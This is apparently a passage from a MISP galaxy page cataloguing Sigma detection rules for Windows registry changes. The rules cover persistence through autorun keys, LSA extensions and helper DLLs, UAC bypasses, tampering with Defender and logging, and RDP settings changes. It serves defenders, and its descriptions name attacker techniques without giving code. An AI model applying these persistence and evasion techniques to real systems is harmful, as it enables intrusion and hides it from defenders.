UUID d223b46b-5621-4037-88fe-fda32eead684 which can be used as unique global reference for New Root or CA or AuthRoot Certificate to Store in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-04-04
falsepositive ['Unknown']
filename registry_set_install_root_or_ca_certificat.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.impact', 'attack.t1490']
Related clusters

To see the related clusters, click here.

Potential Persistence Via CHM Helper DLL

Detects when an attacker modifies the registry key "HtmlHelp Author" to achieve persistence

Internal MISP references

UUID 976dd1f2-a484-45ec-aa1d-0e87e882262b which can be used as unique global reference for Potential Persistence Via CHM Helper DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-07-21
falsepositive ['Unknown']
filename registry_set_persistence_chm.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

New Netsh Helper DLL Registered From A Suspicious Location

Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper

Internal MISP references

UUID e7b18879-676e-4a0e-ae18-27039185a8e7 which can be used as unique global reference for New Netsh Helper DLL Registered From A Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-11-28
falsepositive ['Unknown']
filename registry_set_netsh_help_dll_persistence_susp_location.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.007']
Related clusters

To see the related clusters, click here.

Suspicious Keyboard Layout Load

Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only

Internal MISP references

UUID 34aa0252-6039-40ff-951f-939fd6ce47d8 which can be used as unique global reference for Suspicious Keyboard Layout Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019-10-12
falsepositive ["Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)"]
filename registry_set_susp_keyboard_layout_load.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.resource-development', 'attack.t1588.002']
Related clusters

To see the related clusters, click here.

Sysmon Driver Altitude Change

Detects changes in Sysmon driver altitude value. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.

Internal MISP references

UUID 4916a35e-bfc4-47d0-8e25-a003d7067061 which can be used as unique global reference for Sysmon Driver Altitude Change in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author B.Talebi
creation_date 2022-07-28
falsepositive ['Legitimate driver altitude change to hide sysmon']
filename registry_set_change_sysmon_driver_altitude.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Allow RDP Remote Assistance Feature

Detect enable rdp feature to allow specific user to rdp connect on the targeted machine

Internal MISP references

UUID 37b437cf-3fc5-4c8e-9c94-1d7c9aff842b which can be used as unique global reference for Allow RDP Remote Assistance Feature in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-08-19
falsepositive ['Legitimate use of the feature (alerts should be investigated either way)']
filename registry_set_allow_rdp_remote_assistance_feature.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Potential Persistence Via LSA Extensions

Detects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions" to include a custom DLL to achieve persistence via lsass. The "Extensions" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.

Internal MISP references

UUID 41f6531d-af6e-4c6e-918f-b946f2b85a36 which can be used as unique global reference for Potential Persistence Via LSA Extensions in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-07-21
falsepositive ['Unlikely']
filename registry_set_persistence_lsa_extension.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

RDP Sensitive Settings Changed

Detects tampering of RDP Terminal Service/Server sensitive settings. Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc

Internal MISP references

UUID 3f6b7b62-61aa-45db-96bd-9c31b36b653c which can be used as unique global reference for RDP Sensitive Settings Changed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali
creation_date 2022-08-06
falsepositive ['Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)']
filename registry_set_terminal_server_tampering.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.persistence', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Registry Disable System Restore

Detects the modification of the registry to disable a system restore on the computer

Internal MISP references

UUID 5de03871-5d46-4539-a82d-3aa992a69a83 which can be used as unique global reference for Registry Disable System Restore in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-04-04
falsepositive ['Unknown']
filename registry_set_disable_system_restore.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.impact', 'attack.t1490']
Related clusters

To see the related clusters, click here.

VBScript Payload Stored in Registry

Detects VBScript content stored into registry keys as seen being used by UNC2452 group

Internal MISP references

UUID 46490193-1b22-4c29-bdd6-5bf63907216f which can be used as unique global reference for VBScript Payload Stored in Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021-03-05
falsepositive ['Unknown']
filename registry_set_vbs_payload_stored.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

New TimeProviders Registered With Uncommon DLL Name

Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.

Internal MISP references

UUID e88a6ddc-74f7-463b-9b26-f69fc0d2ce85 which can be used as unique global reference for New TimeProviders Registered With Uncommon DLL Name in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-06-19
falsepositive ['Unknown']
filename registry_set_timeproviders_dllname.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.privilege-escalation', 'attack.t1547.003']
Related clusters

To see the related clusters, click here.

Antivirus Filter Driver Disallowed On Dev Drive - Registry

Detects activity that indicates a user disabling the ability for Antivirus mini filter to inspect a "Dev Drive".

Internal MISP references

UUID 31e124fb-5dc4-42a0-83b3-44a69c77b271 which can be used as unique global reference for Antivirus Filter Driver Disallowed On Dev Drive - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @kostastsale, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-11-05
falsepositive ['Unlikely']
filename registry_set_devdrv_disallow_antivirus_filter.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Office Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID baecf8fb-edbf-429f-9ade-31fc3f22b970 which can be used as unique global reference for Office Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019-10-25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_office.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Hypervisor Enforced Code Integrity Disabled

Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel

Internal MISP references

UUID 8b7273a4-ba5d-4d8a-b04f-11f2900d043a which can be used as unique global reference for Hypervisor Enforced Code Integrity Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Anish Bogati
creation_date 2023-03-14
falsepositive ['Unknown']
filename registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Disable Windows Defender Functionalities Via Registry Keys

Detects when attackers or tools disable Windows Defender functionalities via the Windows registry

Internal MISP references

UUID 0eb46774-f1ab-4a74-8238-1155855f2263 which can be used as unique global reference for Disable Windows Defender Functionalities Via Registry Keys in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali, Swachchhanda Shrawan Poudel
creation_date 2022-08-01
falsepositive ['Administrator actions via the Windows Defender interface', 'Third party Antivirus']
filename registry_set_windows_defender_tamper.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Bypass UAC Using SilentCleanup Task

Detects the setting of the environement variable "windir" to a non default value. Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task. The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC.

Internal MISP references

UUID 724ea201-6514-4f38-9739-e5973c34f49a which can be used as unique global reference for Bypass UAC Using SilentCleanup Task in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nextron Systems
creation_date 2022-01-06
falsepositive ['Unknown']
filename registry_set_bypass_uac_using_silentcleanup_task.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Classes Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID 9df5f547-c86a-433e-b533-f2794357e242 which can be used as unique global reference for Classes Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019-10-25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_classes.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Potential SentinelOne Shell Context Menu Scan Command Tampering

Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne.

Internal MISP references

UUID 6c304b02-06e6-402d-8be4-d5833cdf8198 which can be used as unique global reference for Potential SentinelOne Shell Context Menu Scan Command Tampering in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2024-03-06
falsepositive ['Unknown']
filename registry_set_sentinelone_shell_context_tampering.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

Potential AutoLogger Sessions Tampering

Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging

Internal MISP references

UUID f37b4bce-49d0-4087-9f5b-58bffda77316 which can be used as unique global reference for Potential AutoLogger Sessions Tampering in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-01
falsepositive ['Unknown']
filename registry_set_disable_autologger_sessions.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion']

Registry Modification to Hidden File Extension

Hides the file extension through modification of the registry

Internal MISP references

UUID 5df86130-4e95-4a54-90f7-26541b40aec2 which can be used as unique global reference for Registry Modification to Hidden File Extension in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-01-22
falsepositive ['Administrative scripts']
filename registry_set_hidden_extention.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1137']
Related clusters

To see the related clusters, click here.

Winget Admin Settings Modification

Detects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks

Internal MISP references

UUID 6db5eaf9-88f7-4ed9-af7d-9ef2ad12f236 which can be used as unique global reference for Winget Admin Settings Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-04-17
falsepositive ["The event doesn't contain information about the type of change. False positives are expected with legitimate changes"]
filename registry_set_winget_admin_settings_tampering.yml
level low
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.persistence']

CurrentVersion NT Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID cbf93e5d-ca6c-4722-8bea-e9119007c248 which can be used as unique global reference for CurrentVersion NT Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019-10-25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_currentversion_nt.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Shim Database In Uncommon Location

Detects the installation of a new shim database where the file is located in a non-default location

Internal MISP references

UUID 6b6976a3-b0e6-4723-ac24-ae38a737af41 which can be used as unique global reference for Potential Persistence Via Shim Database In Uncommon Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-08-01
falsepositive ['Unknown']
filename registry_set_persistence_shim_database_uncommon_location.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.011']
Related clusters

To see the related clusters, click here.

ServiceDll Hijack

Detects changes to the "ServiceDLL" value related to a service in the registry. This is often used as a method of persistence.

Internal MISP references

UUID 612e47e9-8a59-43a6-b404-f48683f45bd6 which can be used as unique global reference for ServiceDll Hijack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-02-04
falsepositive ['Administrative scripts', 'Installation of a service']
filename registry_set_servicedll_hijack.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.privilege-escalation', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

WinSock2 Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID d6c2ce7e-afb5-4337-9ca4-4b5254ed0565 which can be used as unique global reference for WinSock2 Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019-10-25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_winsock2.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Add Port Monitor Persistence in Registry

Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.

Internal MISP references

UUID 944e8941-f6f6-4ee8-ac05-1c224e923c0e which can be used as unique global reference for Add Port Monitor Persistence in Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021-12-30
falsepositive ['Unknown']
filename registry_set_add_port_monitor.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.010']
Related clusters

To see the related clusters, click here.

WFP Filter Added via Registry

Detects registry modifications that add Windows Filtering Platform (WFP) filters, which may be used to block security tools and EDR agents from reporting events.

Internal MISP references

UUID 1f1d8209-636e-4c6c-a137-781cca8b82f9 which can be used as unique global reference for WFP Filter Added via Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Frack113
creation_date 2025-10-23
falsepositive ['Unknown']
filename registry_set_susp_wfp_filter_added.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.execution', 'attack.t1562', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

Persistence Via Disk Cleanup Handler - Autorun

Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun. The disk cleanup manager is part of the operating system. It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.

Internal MISP references

UUID d4e2745c-f0c6-4bde-a3ab-b553b3f693cc which can be used as unique global reference for Persistence Via Disk Cleanup Handler - Autorun in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-07-21
falsepositive ['Unknown']
filename registry_set_disk_cleanup_handler_autorun_persistence.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

DNS-over-HTTPS Enabled by Registry

Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or be used to hide the process of exfiltrating data. With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.

Internal MISP references

UUID 04b45a8a-d11d-49e4-9acc-4a1b524407a5 which can be used as unique global reference for DNS-over-HTTPS Enabled by Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer
creation_date 2021-07-22
falsepositive ['Unlikely']
filename registry_set_dns_over_https_enabled.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1140', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Scripted Diagnostics Turn Off Check Enabled - Registry

Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability

Internal MISP references

UUID 7d995e63-ec83-4aa3-89d5-8a17b5c87c86 which can be used as unique global reference for Scripted Diagnostics Turn Off Check Enabled - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock @securepeacock, SCYTHE @scythe_io
creation_date 2022-06-15
falsepositive ['Administrator actions']
filename registry_set_enabling_turnoffcheck.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Activate Suppression of Windows Security Center Notifications

Detect set Notification_Suppress to 1 to disable the Windows security center notification

Internal MISP references

UUID 0c93308a-3f1b-40a9-b649-57ea1a1c1d63 which can be used as unique global reference for Activate Suppression of Windows Security Center Notifications in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-08-19
falsepositive ['Unknown']
filename registry_set_suppress_defender_notifications.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Persistence Via Hhctrl.ocx

Detects when an attacker modifies the registry value of the "hhctrl" to point to a custom binary

Internal MISP references

UUID f10ed525-97fe-4fed-be7c-2feecca941b1 which can be used as unique global reference for Persistence Via Hhctrl.ocx in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-07-21
falsepositive ['Unlikely']
filename registry_set_hhctrl_persistence.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

New BgInfo.EXE Custom VBScript Registry Configuration

Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via "BgInfo.exe"

Internal MISP references

UUID 992dd79f-dde8-4bb0-9085-6350ba97cfb3 which can be used as unique global reference for New BgInfo.EXE Custom VBScript Registry Configuration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-08-16
falsepositive ['Legitimate VBScript']
filename registry_set_bginfo_custom_vbscript.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

CurrentControlSet Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID f674e36a-4b91-431e-8aef-f8a96c2aca35 which can be used as unique global reference for CurrentControlSet Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019-10-25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_currentcontrolset.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

CrashControl CrashDump Disabled

Detects disabling the CrashDump per registry (as used by HermeticWiper)

Internal MISP references

UUID 2ff692c2-4594-41ec-8fcb-46587de769e0 which can be used as unique global reference for CrashControl CrashDump Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tobias Michalski (Nextron Systems)
creation_date 2022-02-24
falsepositive ['Legitimate disabling of crashdumps']
filename registry_set_crashdump_disabled.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1564', 'attack.t1112']
Related clusters

To see the related clusters, click here.

New BgInfo.EXE Custom WMI Query Registry Configuration

Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom WMI query via "BgInfo.exe"

Internal MISP references

UUID cd277474-5c52-4423-a52b-ac2d7969902f which can be used as unique global reference for New BgInfo.EXE Custom WMI Query Registry Configuration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-08-16
falsepositive ['Legitimate WMI query']
filename registry_set_bginfo_custom_wmi_query.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Trust Access Disable For VBApplications

Detects registry changes to Microsoft Office "AccessVBOM" to a value of "1" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft Office warnings.

Internal MISP references

UUID 1a5c46e9-f32f-42f7-b2bc-6e9084db7fbf which can be used as unique global reference for Trust Access Disable For VBApplications in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems)
creation_date 2020-05-22
falsepositive ['Unlikely']
filename registry_set_office_access_vbom_tamper.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Potential Registry Persistence Attempt Via Windows Telemetry

Detects potential persistence behavior using the windows telemetry registry key. Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type.

Internal MISP references

UUID 73a883d0-0348-4be4-a8d8-51031c2564f8 which can be used as unique global reference for Potential Registry Persistence Attempt Via Windows Telemetry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Lednyov Alexey, oscd.community, Sreeman
creation_date 2020-10-16
falsepositive ['Unknown']
filename registry_set_telemetry_persistence.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.execution', 'attack.persistence', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

Potential Persistence Via App Paths Default Property

Detects changes to the "Default" property for keys located in the \Software\Microsoft\Windows\CurrentVersion\App Paths\ registry. Which might be used as a method of persistence The entries found under App Paths are used primarily for the following purposes. First, to map an application's executable file name to that file's fully qualified path. Second, to prepend information to the PATH environment variable on a per-application, per-process basis.

Internal MISP references

UUID 707e097c-e20f-4f67-8807-1f72ff4500d6 which can be used as unique global reference for Potential Persistence Via App Paths Default Property in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-10
falsepositive ['Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)']
filename registry_set_persistence_app_paths.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.012']
Related clusters

To see the related clusters, click here.

RDP Sensitive Settings Changed to Zero

Detects tampering of RDP Terminal Service/Server sensitive settings. Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.

Internal MISP references

UUID a2863fbc-d5cb-48d5-83fb-d976d4b1743b which can be used as unique global reference for RDP Sensitive Settings Changed to Zero in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali
creation_date 2022-09-29
falsepositive ['Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)']
filename registry_set_terminal_server_suspicious.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense-evasion', 'attack.persistence', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Macro Enabled In A Potentially Suspicious Document

Detects registry changes to Office trust records where the path is located in a potentially suspicious location

Internal MISP references

UUID a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd which can be used as unique global reference for Macro Enabled In A Potentially Suspicious Document in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-06-21
falsepositive ['Unlikely']
filename registry_set_office_trust_record_susp_location.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Bypass UAC Using Event Viewer

Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification

Internal MISP references

UUID 674202d0-b22a-4af4-ae5f-2eda1f3da1af which can be used as unique global reference for Bypass UAC Using Event Viewer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-01-05
falsepositive ['Unknown']
filename registry_set_bypass_uac_using_eventviewer.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.010']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Mpnotify

Detects when an attacker register a new SIP provider for persistence and defense evasion

Internal MISP references

UUID 92772523-d9c1-4c93-9547-b0ca500baba3 which can be used as unique global reference for Potential Persistence Via Mpnotify in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-07-21
falsepositive ['Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way']
filename registry_set_persistence_mpnotify.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

Potentially Suspicious ODBC Driver Registered

Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location

Internal MISP references

UUID e4d22291-f3d5-4b78-9a0c-a1fbaf32a6a4 which can be used as unique global reference for Potentially Suspicious ODBC Driver Registered in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-05-23
falsepositive ['Unlikely']
filename registry_set_odbc_driver_registered_susp.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.credential-access', 'attack.persistence', 'attack.t1003']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Visual Studio Tools for Office

Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.

Internal MISP references

UUID 9d15044a-7cfe-4d23-8085-6ebc11df7685 which can be used as unique global reference for Potential Persistence Via Visual Studio Tools for Office in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj
creation_date 2021-01-10
falsepositive ['Legitimate Addin Installation']
filename registry_set_persistence_office_vsto.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.t1137.006', 'attack.persistence']
Related clusters

To see the related clusters, click here.

Driver Added To Disallowed Images In HVCI - Registry

Detects changes to the "HVCIDisallowedImages" registry value to potentially add a driver to the list, in order to prevent it from loading.

Internal MISP references

UUID 555155a2-03bf-4fe7-af74-d176b3fdbe16 which can be used as unique global reference for Driver Added To Disallowed Images In HVCI - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
